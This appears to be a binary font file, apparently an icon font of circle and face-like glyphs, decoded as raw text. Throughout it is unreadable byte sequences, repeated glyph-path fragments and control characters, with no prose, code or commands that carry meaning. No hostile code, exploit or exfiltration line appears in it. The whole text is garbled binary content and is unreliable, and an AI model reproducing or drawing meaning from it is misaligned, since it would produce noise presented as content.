
/1�:OO:1P*J7

>_
;U		,A%O1(@		 _		`?		��gIJ/$

`@� 	U_it}�>71!!1!>5!1!>7>7#"&5467.#"3.54673:31.#".'!1!.'!1!4&'!1!.'1!.'1!3!267!cF��Z���P
<T		9L3 :�6*gI1/��-�
����i"	 	�  	F	�1 1�  @	#		T<
^>


/JIg

@	@@		�		 �p��)<D/?'?1>7#"&5467"3267%4673:3#"&5/?G''II''I7''II''I��
<T		9LgI>^��6*gIJ/<T�4444Hhhhh�hhhhk		U;
_>IgL9+/JIg*6U;NNN�p��)1/?'?#"&5467>332671/?G''II''I7''II''I��^>IgL9		T<
�4444Hhhhh�hhhhk9LgI>_
;U		=NNN`�`,1>7#"&5467"3267%4673:3#"&5�
<T		9LgI>^��6*gIJ/<T�		U;
_>IgL9+/JIg*6U;`�`#"&5467>33267�^>IgL9		T<
�9LgI>_
;U		
�~B�(7FVeu��1"&54632'2654&#"3"326=4&#.2?64'4&+";26564/&"27126=4&#"3'2?64'&"1';2654&+"172764/&"IggIIggI<TT<<TT<			
�
-
.Y	@		@	Y.-
�	
		�
-.Y	@		@	Y.-
gIIggIIg T<<TT<<T�	@		@	Y.-
�			
�
-
.Y	@		@	Y.-
�	
		�
-.	�~B�*9IXhx�2654&#"3"326=4&#.2?64'4&+";26564/&"27126=4&#"3'2?64'&"1';2654&+"172764/&"IggIIggI			
�
-
.Y	@		@	Y.-
�	
		�
-.Y	@		@	Y.-
gIIggIIg�	@		@	Y.-
�			
�
-
.Y	@		@	Y.-
�	
		�
-.��B�/?O_p�";732654&+'#%6454&#"3&4546323"326=4&#1.2?64'14&+";2651!;2654&+"972764/&"1�		�]]�

�pp��gIIg T<<T �			
�
-
.Y	@		@	��	@		@	Y.-

	PP
	``@IggI<TT<@	@		@	Y.-
�			
	
		�
-.��B�!1ARgw#&4546321#'"326=4&#1.2?64'14&+";2651!;2654&+"9";732654&+'#2764/&"1�RgIIgR]]]			
�
-
.Y	@		@	��	@		@			�]]�

�pp�G.-
@IggIPP@	@		@	Y.-
�			
	
		O
	PP
	``'
-.��B�*:J[k�6454&#"3&4546323"326=4&#1.2?64'14&+";2651!;2654&+"972764/&"1"&546;732+'#�gIIg T<<T �			
�
-
.Y	@		@	��	@		@	Y.-
H		�]]�

�pp��IggI<TT<@	@		@	Y.-
�			
	
		�
-.��
	PP
	``��A�
.>O_t6454&#"!"326=4&#1.2?64'94&+";2651!;2654&+"972764/&"1"&546;732+'#�gIIg^�	
	
�
-.Y	@		@	��	@		@	Y.-
G		�]]�

�pp��IggI@	@		@	Y.-
�			
	
		�
-.��
	PP
	``��B�)8GWfv6454&#"3&4546323"326=4&#.2?64'4&+";265!;2654&+"172764/&""13!26514&#�gIIg T<<T �			
�
-
.Y	@		@	��	@		@	Y.-
H		@

@IggI<TT<@	@		@	Y.-
�			
	
		�
-.��
	
	��B�
+:JYi6454&#"!"326=4&#.2?64'4&+";265!;2654&+"172764/&""13!26514&#�gIIg^�			
�
-
.Y	@		@	��	@		@	Y.-
H		@

@IggI@	@		@	Y.-
�			
	
		�
-.��
	
	�@`
,;L.#"3>32"326=4&#.2?64'1!2764/&""13!26514&#!�^<<^!J//J�	
	
�
-.�P.-
H

@

��`7II7*66*	@		@	Y.-

-.�
	
	�@`%4E.#""326=4&#.2?64'1!2764/&""13!26514&#!�^<<^�	
	
�
-.�P.-
H

@

��`7II7	@		@	Y.-

-.�
	
		 `&Mt������20#"&5.#"#"&5<1>32#"&5.#"#"&5<5>32#"&5.#"#"&5<7>3"3!2654&#!4&#">32>51326=4&#"2?64'.1#";2654&#1%2764/&"1h��S		N��aa��N		S��hZ�yI		Dp�TT�pD		Iy�ZM�h?		:_}GG}_:		?h�M�		�		� pgI4T	B'<T
�
	
	�-.
`@		@		�.-
`M��g		a�}II}�a		g��M@Ct�Y		S�m>>m�S		Y�tC@9b�L		F{[44[{F		L�b9�`
	
	�Ig7+'T<! @		@		I.-
�		
	�-.
	 `&Mt������20#"&5.#"#"&5<1>32#"&5.#"#"&5<5>32#"&5.#"#"&5<7>3"3!2654&#!4&#">51326=4&#"2?64'.1#";2654&#1%2764/&"1h��S		N��aa��N		S��hZ�yI		Dp�TT�pD		Iy�ZM�h?		:_}GG}_:		?h�M�		�		� pgI4T.XQJ �
	
	�-.
`@		@		�.-
`M��g		a�}II}�a		g��M@Ct�Y		S�m>>m�S		Y�tC@9b�L		F{[44[{F		L�b9�`
	
	�Ig7+%1! @		@		I.-
�		
	�-.
 �MXbr���24.'54&#"463246324632#"&=4&#"3265463246324631%.#"1>75.#"'.#"1>79!9.'.#".#">79%.#".'1�!/K��d
	d��K/!!//!!//!!/


	%%/!!//!!//!�P)'U8 8U')�#sN!0�0!Ns#��
mI.BIIm
B.@%AsV40		04VsA%%%%%%�@

0		0&%�%%%%%
Wx��xW


Ehb;;bhE

2Q W3�Q23W  �O34&#"14&#"4&#"1#"&=463232654&#"4&#"4&#"4>754632`�/!!//!!//!!/%%	


/!!//!!//!!/K��d	
d��K%%%%%%�@%&0		0

�%%%%%%AsV40		04VsA ��&3@M132654&10132654&10132654&10%4610#"&5%4610#"&54610#"&5 (()'PP@(()'PP�(()'PP00 ��00 `00 P13(hh�13(hh��13(hh�EE�EE��EE ��&4610#"&54610#"&54610#"&5 PP')((@PP')((�PP')((P(hh(31�(hh(31�(hh(31���!132654.104>10#"&5�K55K(0((0( $$CCy2GG2YT;;TYEC00CE+..+���4>10#"&�(0((0(K55KyYT;;TY2GG	(#�4'4BJW�!!.77>7>721!.'!7!4&7!#"&'.'%!>7>2!.'!#"&'.''.10103267>106762103261067>10676&'."'1@`��+Qj���J��]7B,+*��iQ+��K	+,B�5ywk&	


.A,,;
@
;,,A.

	&kwy5.� 
`	 h	�

�	'	�9$7797 

 7977$9'#�4@.10103267>106762103261067>10676&'."'�5ywl&	


.A,,;
@
;+,B-


	&kwz4.!9$7797 

 7977$9�� /?7'?'?'?�((HH((H�''II''I�''II''I��??��??��llll�hhhh��hhhh��00��0�� '?'?'?�''II''I�''II''I��??��??��hhhh��hhhh��00��0@�/Uv9#!"&5467<54>32>32>32#'32654&+>54&#".#">3293!2654&'4654&#".#"1@^B��B^6*#=R.#M2"J-B^+9K5@@(88(	K5.F	+(=)/Hg	�K5 5K8)T<4[8Pp*9@1B^^B1O.R=#.=	$-^B	
E.5K 8((8!5K:+2%"eH	�5KK5-E

<T/:pP	
F-@�#C>54&'>54&#".#">329#!"&5467<54>32>321f3G9+^B-J")D6*Pv	$
^B��B^6*#=R.7^/Hg*6@J3.E
	B^-$	+"
#		kN
$`B^^B1O.R=#1)eHO1��@�,@>7>7#"&5467"7.54673:3";732654&+'r
<T		9L+$ (6*gI�~

�]]�

�ppJ.		U;
_>.MB(/JIg!J
	PP
	``��@�.>7>7#"&5467"7";732654&+'k
<T		9L0'y[��

�]]�

�ppR*		U;
_>0QhNR
	PP
	``��@�,@1>7#"&5467"3267%4673:3#"&5"&546;732+'�
<T		9LgI>^��6*gIJ/<T�

�]]�

�pp�		U;
_>IgL9+/JIg*6U;��
	PP
	``��@�-#"&5467>332671"&546;732+'�_>IgL9		T<
�F

�]]�

�pp�9LgI>_
;U		�
	PP
	```���.J4&#"34632#!!265%4&#"134632#!!265#1"&5133126514&#!5!21�K55K 8((88(� �5K��8((8 %%&���(8�%% 


�@�%5KK5(88((8 K5 (88(%%% 8(�%%


 %`��/L4&#"34632#!!265%4&#"134632#!!2651#1"&5133126514&#!5!29�K55K@%%%� �5K��K55K@%%&���5K�8((8@


�@�(85KK5%%%@K5�5KK5%%%@K5�`(88(


@8(@��2654&#"3PppPPppPpPPppPPp@��#"&54632�pPPppPPp�PppPPpp@��181"3"&5462654&#"3(88(B^^BPppPPppP`^BB^^BB^��pPPppPPp@��#"&546322654&#"3 5KK5)77) PppPPppPDK55KD--DDpPPppPPp@��1"&54632'"3PppPPppPB^^BpPPppPPp @^BB^@��2654&#"3'463"&5PppPPppP�K55KpPPppPPp�5K�K5@��12#"&5462654&#"3(88(B^^BPppPPppP`^BB^^BB^��pPPppPPp@��12#"&5462654&#"3%%5KK5PppPPppP@K55KK55K��pPPppPPp@��1"&54632'2654&#"3PppPPppPB^^BB^^BpPPppPPp ^BB^^BB^@��1"&54632'2654&#"3PppPPppP5KK55KK5pPPppPPp@K55KK55K@��1"32654&"&54632#(88(B^^BPppPPppP`^BB^^BB^��pPPppPPp@��2#"&54632654&#"35KK5%%PppPPppP@K55KK55K��pPPppPPp@��12654&#"72#PppPPppPB^^BpPPppPPp @^BB^@��1"&5463274&#265PppPPpp0K55KpPPppPPp�5K�K5@��1812#2654&"&54632#(88(B^^BPppPPppP`^BB^^BB^��pPPppPPp@��>32#"&'>54&'2654&#"3�5KK5)77) PppPPppP<K55KD--D��pPPppPPp
`��
/=M]n~���#"&546?>54.#"7.54>322654&#"31"326=4&#1&6?6&'1.?>'96&/&671!?>'.95676&/&977>/.1=/!!/-�Du�YY�uD?l�SS�l?��	
	
�
9
9�\\\\�D\\\\�9
9

#!//!#
��!F%Y�uDDu�Y%F!	B"S�l??l�S"B- 	`		`	FN
O
����
O
N	`�� .>N_o���'!.54>32!>54&'2654&#"31"326=4&#1&6?6&'1.?>'96&/&671!?>'.95676&/&977>/.1=--��
Du�YY�uD
��-	
	
�
9
9�\\\\�D\\\\�9
9
��
#"H&Y�uDDu�Y&H"#
r@	`		`	FN
O
����
O
N` �`)@M%1".54>32'2>54.#"3041#"&5054>12654&#"3V�qAAq�VV�qAAq�VP�i<<i�PP�i<<i�P$8((8$%%%% Aq�VV�qAAq�VV�qA <i�PP�i<<i�PP�i<�H``(88(``H��%%%%` �`)>Ub%1".54>32'2>54.#"352>54.#"3041#"&5054>12654&#"3V�qAAq�VV�qAAq�VP�i<<i�PP�i<<i�PI�`77`�II�`77`�I$8((8$%%%% Aq�VV�qAAq�VV�qA <i�PP�i<<i�PP�i< 7`�II�`77`�II�`7�H``(88(``H��%%%%` �`):G132>54.#"4>32#".5!4&#"103265#4632#"&5`Aq�VV�qAAq�VV�qA <i�PP�i<<i�PP�i<�8(``HH``(8�%%%%�V�qAAq�VV�qAAq�VP�i<<i�PP�i<<i�P(8$$8(%%%%` �`)>O\12#".54>"32>54.#"32>54.#2#".10>3"32654&#V�qAAq�VV�qAAq�VP�i<<i�PP�i<<i�PI�`77`�II�`77`�I(88(``HH``%%%%`Aq�VV�qAAq�VV�qA <i�PP�i<<i�PP�i< 7`�II�`77`�II�`7�8((8$$ %%%%` �`):G14.#"32>'#".54>32!32>10.#"3#"&54632�Aq�VV�qAAq�VV�qA <i�PP�i<<i�PP�i<� 8(``HH``(8�%%%%�V�qAAq�VV�qAAq�VP�i<<i�PP�i<<i�P(8$$8(%%%%` �`)>O\%1".54>32'2>54.#"352>54.#"3"&5463210#52654&#"3V�qAAq�VV�qAAq�VP�i<<i�PP�i<<i�PI�`77`�II�`77`�I(88(``HH``%%%% Aq�VV�qAAq�VV�qA <i�PP�i<<i�PP�i< 7`�II�`77`�II�`78((8$$ %%%%` �`):G14.#"32>'#".54>32!4&#"10>5##"&54632�Aq�VV�qAAq�VV�qA <i�PP�i<<i�PP�i<��8((8$$ %%%%�V�qAAq�VV�qAAq�VP�i<<i�PP�i<<i�P(88(``HH``%%%%` �`)>O\14>32#".732>54.#"332>54.#"!463210.5332654&#"`Aq�VV�qAAq�VV�qA <i�PP�i<<i�PP�i< 7`�II�`77`�II�`78((8$$ %%%%�V�qAAq�VV�qAAq�VP�i<<i�PP�i<<i�PI�`77`�II�`77`�I(88(``HH``%%%%� `@"&55555'"32654&#3%5�@@ @�``�``�``�	
	
0`S����
��
�
�
�
-	�			��@�� `@	
 55%5%"32654&#3%5��`��@`��	
	
0`;��
��"�
��	�			��@�q����'Rg9#".'10&'.>7>'%>3210&'.'.>76.714.#"32>5Ag�L=o]G"b*D3%X�99$�7<~UHqK$��Bf�SR�fBAxYL~H-kD'K{2 3A *A1�7`�II�`77`�II�`75+ )e9=mZCM+5X=JYd4+ZSG(%$Nam70[N>+^M2k*J1Jbr;<AG'####q����*?>3210&'.'.>76.714.#"32>5qBf�SR�fBAxYL~H-kD'K{2 3A *A1�7`�II�`77`�II�`7]%$Nam70[N>+^M2k*J1Jbr;<AG'####��`<1"&54632'2654&#"3%"31265326514&+546;26514&+ 5KK55KK5(88((88(`B^
	�	
�K5�		�K55KK55K 8((88((8�^B�0	
0
	�5K
	��`<1"&54632'2654&#"3%"31265326514&+546;26514&+ 5KK55KK5%%%%`B^

�

�8(�

�K55KK55K@%%%%�^B�@



�(8

��`-:G326=4&+";26=4&#"+"&546;21"&54632'2654&#"3@
	^B@B^^B@B^
	K5@5KK5@5K��5KK55KK5(88((88(P	
B^^B��B^^B	
5KK5@5KK5`K55KK55K 8((88((8��`+9G"+"&546;232654&+";2654&#1%9"&54632'2654&#"31@
8(@(88(@(8

^B@B^^B@B^
��5KK55KK5%%%%@
(88(@(88(

B^^B��B^^B
�K55KK55K@%%%%t`��(5	3!26'&"62#!"&7"326=4&#2654&#"3��$5�5#��<		`�S`







���-@@-.""��  9�
�

�
��



t`��'%&"13!26%"&546327#"&=46312���<��#5�5#�Y






�.""��-@@ 



�

�

` �`)?L%1".54>32'2>54.#"310>7>101'2764'&"V�qAAq�VV�qAAq�VP�i<<i�PP�i<<i�PDbcL!17bcL!17q66 Aq�VV�qAAq�VV�qA <i�PP�i<<i�PP�i<<71!Lcb71!Lcb66` �`)>Ta%1".54>32'2>54.#"352>54.#"310>7>101'2764'&"V�qAAq�VV�qAAq�VP�i<<i�PP�i<<i�PI�`77`�II�`77`�IDbcL!17bcL!17q66 Aq�VV�qAAq�VV�qA <i�PP�i<<i�PP�i< 7`�II�`77`�II�`771!Lcb71!Lcb66� �@)>KZix�%1".54>32'2>54.#"310>7>10'2764'&""326=4&#4&+";26526=4&#"3;2654&+"S�l??l�SS�l??l�SL�d::d�LL�d::d�L9Z[E"07Z[E"07[(("	
	
Q	a
	a	��	
	
��	a
	a	 ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:770"E[Z70"E[Z((r	`		`	��

		��	a		a	R		

	� �@)>S`o~��%1".54>32'2>54.#"352>54.#"310>7>10'2764'&"12#"&=461+"&546;21"&=4632146;2+"&S�l??l�SS�l??l�SL�d::d�LL�d::d�LFz[55[zFFz[55[zF9Z[E"07Z[E"07[(("
	
	8	a	
a	��
	
	��	a	
a	 ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d: 5[zFFz[55[zFFz[570"E[Z70"E[Z((R	`		`	��		

��	a		a	2

		� �@)>M\kz�%1".54>32'2>54.#"310>7>10"326=4&#4&+";26526=4&#"3;2654&+"%10>7'S�l??l�SS�l??l�SL�d::d�LL�d::d�L9Z[E"07Z[E"079	
	
Q	a
	a	��	
	
��	a
	a	/
&#.=;C ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:770"E[Z70"E[Z�	`		`	��

		��	a		a	R		

!
;</$%
D	� �@)>Sbq���%1".54>32'2>54.#"352>54.#"310>7>1012#"&=461+"&546;21"&=4632146;2+"&%10>7'S�l??l�SS�l??l�SL�d::d�LL�d::d�LFz[55[zFFz[55[zF9Z[E"07Z[E"079
	
	8	a	
a	��
	
	��	a	
a	
&#.=;C ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d: 5[zFFz[55[zFFz[570"E[Z70"E[Zi	`		`	��		

��	a		a	2

		(
;</$%
D` �`)?K%1".54>32'2>54.#"310>7>101'10>7'V�qAAq�VV�qAAq�VP�i<<i�PP�i<<i�PDbcL!17bcL!17p(#4EDZ Aq�VV�qAAq�VV�qA <i�PP�i<<i�PP�i<<71!Lcb71!LcbqED4#([` �`)>T`%1".54>32'2>54.#"352>54.#"310>7>101'10>7'V�qAAq�VV�qAAq�VP�i<<i�PP�i<<i�PI�`77`�II�`77`�IDbcL!17bcL!17p(#4EDZ Aq�VV�qAAq�VV�qA <i�PP�i<<i�PP�i< 7`�II�`77`�II�`771!Lcb71!LcbqED4#([`����'%4&#"32654&7#"&54674632@%%#K55K##^BB^#8((8�Q&%��:$5KK5$:"C'B^^B'C@(88(@����0%4&#"32654&7#"&54674&546329@%%#K55K#"#pPPp#K55K�Q&%��:$5KK5$:2K+PppP+K 5KK5��`����'4%4&#"32654&7#"&546746322654&#"3@%%#K55K##^BB^#8((8`(88((88(�Q&%��:$5KK5$:"C'B^^B'C@(88(��8((88((8@����0=%4&#"32654&7#"&54674&5463292654&#"3@%%#K55K#"#pPPp#K55K(88((88(�Q&%��:$5KK5$:2K+PppP+K 5KK5���8((88((8`����/C%#"&5467<=4632174&#"32654&7#"&54674632 $8((8$

 %%#K55K##^BB^#8((8�
2(88(2
�

�Q&%��:$5KK5$:"C'B^^B'C@(88(@����/L%#"&5467<=4632174&#"32654&7#"&54674&546329 $8((8$

 %%#K55K#"#pPPp#K55K�
2(88(2
�

�Q&%��:$5KK5$:2K+PppP+K 5KK5��`����/C%#"&5467<54632174&#"32654&7#"&54674632 $8((8$

 %%#K55K##^BB^#8((8�
2(88(2
@

��Q&%��:$5KK5$:"C'B^^B'C@(88(@����/L%#"&5467<54632174&#"32654&7#"&54674&546329 $8((8$

 %%#K55K#"#pPPp#K55K�
2(88(2
@

��Q&%��:$5KK5$:2K+PppP+K 5KK5��`����/C%#"&5467<54632174&#"32654&7#"&54674632 $8((8$

 %%#K55K##^BB^#8((8�
2(88(2
�

� Q&%��:$5KK5$:"C'B^^B'C@(88(@����/L%#"&5467<54632174&#"32654&7#"&54674&546329 $8((8$

 %%#K55K#"#pPPp#K55K�
2(88(2
�

� Q&%��:$5KK5$:2K+PppP+K 5KK5��`����.B%#"&5467<5463274&#"32654&7#"&54674632 $8((8$

 %%#K55K##^BB^#8((8�
2(88(2
`

��Q&%��:$5KK5$:"C'B^^B'C@(88(@����.K%#"&5467<5463274&#"32654&7#"&54674&546329 $8((8$

 %%#K55K#"#pPPp#K55K�
2(88(2
`

��Q&%��:$5KK5$:2K+PppP+K 5KK5��`���7#37##33"1}IR/�QqQ`�0p������`���`���#33�Q`�0p���������r�FWer10&'9'1067.'17.'10#"&1'&>7>7>32903261*#*97.10>3212654&#"3LbfgF
�WXzP
�^W;Mfk"$$"kgM;V_	

b

%%&&�+*P3
	.?E2$	
%ED8)/�  �/)8DE %tnNNnt% n�*

ּko�W�%%%%���r�+=J.'10#"&1'&>73265<'9'.#">3212654&#"3h^W;Mfk"$$"kgM;V_9'(8#

	
<%%&&.ED8)/�  �/)8DE(88(=%tnNNnt%

�%%%%��@�7#&'&4?#"&546;'&476213'"+"&546;'&4762546325./&47>5463276#7&4=463276232+"&'13>?6232+/.51#:;2+"/#"&=<7'"/#"&="'&4?2675#"&="'&4?#"&546;231�J�.

.�I@		'

	J.
	

.J	

'		@I�.



.�J@		&

	J-
	

.J
	
'

AVJ.
	
-J	

&		@I�-



-�IA

&
	
J-	

.J	

(		@J�.



.�JA		'
	
�@� 7#&'&4?#"&546;'&476213'"+"&546;'&4762546325./&47>5463276#7&4=463276232+"&'13>?6232+/.51#:;2+"/#"&=<7'"/#"&="'&4?2675#"&="'&4?#"&546;2312>54.#"3�J�.

.�I@		'

	J.
	

.J	

'		@I�.



.�J@		&

	J-
	

.J
	
'

AqL�d::d�LL�d::d�LVJ.
	
-J	

&		@I�-



-�IA

&
	
J-	

.J	

(		@J�.



.�JA		'
	
��:d�LL�d::d�LL�d:	� �@)6CP]jw{%1".54>32'2>54.#"31"&54632'2654&#"31"&54632'2654&#"3%2654&#"3!2654&#"335S�l??l�SS�l??l�SL�d::d�LL�d::d�L�(88((88(%%%% (88((88(%%%%��



 



� ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�8((88((8 %%%% 8((88((8 %%%% 







�  � �@+7CO[_%".54>322654&#"7"&546322654&#"7"&54632%2654&#"!2654&#"35S�l??l�SS�l??l��(88((88(%%%%(88((88(%%%%��


-


Ӡ ?l�SS�l??l�SS�l?�8((88((8 %%%% 8((88((8 %%%% 







�  
� �@)6CP]jw��%1".54>32'2>54.#"31"&54632'2654&#"31"&54632'2654&#"3%2654&#"3!2654&#"31"&54632'2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�L�(88((88(%%%% (88((88(%%%%��



 



�!//!!//! ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�8((88((8 %%%% 8((88((8 %%%% 







��/!!//!!/ � �@+7CO[g%".54>322654&#"7"&546322654&#"7"&54632%2654&#"!2654&#"2654&#"S�l??l�SS�l??l��(88((88(%%%%(88((88(%%%%��


-


�!//!!// ?l�SS�l??l�SS�l?�8((88((8 %%%% 8((88((8 %%%% 







��/!!//!!/	� �@?Tan{���'>32.#"#.#"3265133265<57#".54672>54.#"31"&54632!1"&54632%2654&#"3!2654&#"31"&54632'2654&#"3*OBO[00[OBO.2
j
2.
8((8`8((8U:d�LL�d:ES�l??l�SS�l??l�S�%%%%%%%%��



 



�!//!!//!J/%>,,>%/$$ (88((88(3'W/L�d::d�L/W'��?l�SS�l??l�SS�l?�%%%%%%%% 







��/!!//!!/ � �@@LXdp|>323>3217.#"813265133265817#".5467"&54632!"&54632%2654&#"!2654&#"2654&#"&02
j
20jIWd66dWIj8((8`8((8t?l�SS�l?�%%%%%%%%��


-


�!//!!//B#$$#@+F22F+@"(88((88(F)\1S�l??l�S1\)�%%%%%%%% 







��/!!//!!/� �@)6C%1".54>32'2>54.#"32654&#"3!2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



 ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







� �@+%".54>322654&#"!2654&#"S�l??l�SS�l??l��


-


 ?l�SS�l??l�SS�l?�







� �@)6CG%1".54>32'2>54.#"32654&#"3!2654&#"3!5S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



��  ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







�  � �@+/%".54>322654&#"!2654&#"!5S�l??l�SS�l??l��


-


��  ?l�SS�l??l�SS�l?�







�  � �@)6CR%1".54>32'2>54.#"32654&#"3!2654&#"3"&10326150#S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



�S\\ST]]T ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







�@ @@ @� �@+9%".54>322654&#"!2654&#""&10326150S�l??l�SS�l??l��


-


�S\\ST]] ?l�SS�l??l�SS�l?�







�@ @@ @� �@)6CR%1".54>32'2>54.#"32654&#"3!2654&#"3"15063210&#S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



�S\\ST]]T ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







�@ @@ @� �@+9%2>54.#""&54632!"&54632"15063210&S�l??l�SS�l??l�=





�S\\ST]] ?l�SS�l??l�SS�l?�







�@ @@ @� �@)6CP]%1".54>32'2>54.#"32654&#"3!2654&#"31"&54632'2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



�!//!!//! ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







��/!!//!!/ � �@+7%".54>322654&#"!2654&#"2654&#"S�l??l�SS�l??l��


-


�!//!!// ?l�SS�l??l�SS�l?�







��/!!//!!/� �@)6CP]%1".54>32'2>54.#"32654&#"3!2654&#"31"&54632'2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



�<TT<<TT<.BB..BB. ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







��/!!//!!/ � �@+7%".54>322654&#"!2654&#"2654&#"S�l??l�SS�l??l��


-


�<TT<<TT ?l�SS�l??l�SS�l?�







��/!!//!!/� �@)6:I%1".54>32'2>54.#"32654&#"3%35326=30+5S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



���_ (� ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�



   ��( � �@".2%2>54.#"7326=30+5"&54632%3#S�l??l�SS�l??l�4_ (� 


���� ?l�SS�l??l�SS�l?�( 



  � �@)6CNU%1".54>32'2>54.#"32654&#"3!2654&#"3!0#".03261S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



���3_NN^3+PvuO ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







�<H<<H< ��� �@+6%".54>322654&#"!2654&#"032>1S�l??l�SS�l??l��


-


��3_NN^3 ?l�SS�l??l�SS�l?�







�<H<<H<� �@)4;?C%1".54>32'2>54.#"3!0#".0326135335S�l??l�SS�l??l�SL�d::d�LL�d::d�L��3_NN^3+PvuO�k��� ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d: <H<<H< ��    � �@"&%".54>32032>1%35335S�l??l�SS�l??l���3_NN^3�@��� ?l�SS�l??l�SS�l?@<H<<H<�    � �@,AP2#"&5#5!2#"&5#51".54>32'2>54.#"3'326=30+5�


@@


@0S�l??l�SS�l??l�SL�d::d�LL�d::d�L_ (�@


 


 ��?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�( � �@+:2#"&5#5!2#"&5#52>54.#"7326=30+5�


@@


@0S�l??l�SS�l??l�4_ (�@


 


 ��?l�SS�l??l�SS�l?�( � �@)-15%1".54>32'2>54.#"3'!5737'S�l??l�SS�l??l�SL�d::d�LL�d::d�L� ��j�j ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�  AHH� �@%".54>32!5737'S�l??l�SS�l??l�� ��j�j ?l�SS�l??l�SS�l?  AHH� �@)-15%1".54>32'2>54.#"3'!535335S�l??l�SS�l??l�SL�d::d�LL�d::d�L� ����� ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�       � �@%".54>32!535335S�l??l�SS�l??l�� ����� ?l�SS�l??l�SS�l?       � �@)-1@%1".54>32'2>54.#"335335"15063210&#S�l??l�SS�l??l�SL�d::d�LL�d::d�LЀ���S\\ST]]T ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:    ��@ @@ @� �@)%2>54.#"3#%3#"15063210&S�l??l�SS�l??l�}�� ��QS\\ST]] ?l�SS�l??l�SS�l?    �@ @@ @� �@)-1@%1".54>32'2>54.#"335335"&10326150#S�l??l�SS�l??l�SL�d::d�LL�d::d�LЀ���S\\ST]]T ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:    ��@ @@ @� �@)%".54>3235335"&10326150S�l??l�SS�l??l��݀���S\\ST]] ?l�SS�l??l�SS�l?     ��@ @@ @� �@)8<@MZ%1".54>32'2>54.#"3'"&10326150#7!7'2654&#"3!2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�LS\\ST]]T�j�$j



 



 ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�@ @@ @�HH�







� �@!%)5A%".54>32'"&103261507!7'2654&#"!2654&#"S�l??l�SS�l??l�TS\\ST]]1j�$j


-


 ?l�SS�l??l�SS�l?�@ @@ @�HH�







� �@)-1>%1".54>32'2>54.#"335335"&1032610#S�l??l�SS�l??l�SL�d::d�LL�d::d�LЀ���HH<TT<HH ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�    � `` � �@'%".54>3235335"&1032610S�l??l�SS�l??l��݀���HH<TT<H ?l�SS�l??l�SS�l?    � `` � �@)8<@MZ%1".54>32'2>54.#"3'"15063210&#7!7'2654&#"3!2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�LS\\ST]]T�j�$j



 



 ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�@ @@ @aHH�







� �@!%)5A%".54>322150&#"1067!7'2654&#"!2654&#"S�l??l�SS�l??l�TT]]TS\\�j�$j


-


 ?l�SS�l??l�SS�l?@ @@ @aHH�







� �@)-15BO%1".54>32'2>54.#"3'!57!7'2654&#"3!2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�L� j�$j



 



 ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�  aHH�







� �@+7%".54>32!57!7'2654&#"!2654&#"S�l??l�SS�l??l�� j�$j


-


 ?l�SS�l??l�SS�l?  aHH�







� �@)-15BO%1".54>32'2>54.#"3'!5737'2654&#"3!2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�L� ��jdj��



 



 ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�  aHH�







� �@+7%".54>32!5737'2654&#"!2654&#"S�l??l�SS�l??l�� ��jdj��


-


 ?l�SS�l??l�SS�l?  aHH�







� �@)6CPTX%1".54>32'2>54.#"35"1063210&#'2654&#"3!2654&#"3'35!35S�l??l�SS�l??l�SL�d::d�LL�d::d�LHH<TT<HH�



 



@��`� ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:� `` �







�    � �@+7;?%2>54.#"7"1063210&'"&54632!"&54632'3#%3#S�l??l�SS�l??l�SHH<TT<H�





M���� ?l�SS�l??l�SS�l?� `` �







�   � �@)6:G%1".54>32'2>54.#"32654&#"3%35"&1032610#S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



���0HH<TT<HH ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�



   � `` � �@#/%".54>322654&#"%35"&1032610S�l??l�SS�l??l�=


�̀0HH<TT<H ?l�SS�l??l�SS�l?�



   � `` � �@)6:>KX%1".54>32'2>54.#"35"1063210&#737'2654&#"3!2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�LHH<TT<HH�jdj��



 



 ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:� `` �HH�







� �@#'3?%".54>32'210&#"106737'2654&#"!2654&#"S�l??l�SS�l??l�SHH<TT<HTjdj��


-


 ?l�SS�l??l�SS�l?� `` �HH�







� �@)6CP%1".54>32'2>54.#"32654&#"3!2654&#"3"&1032610#S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



�HH<TT<HH ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







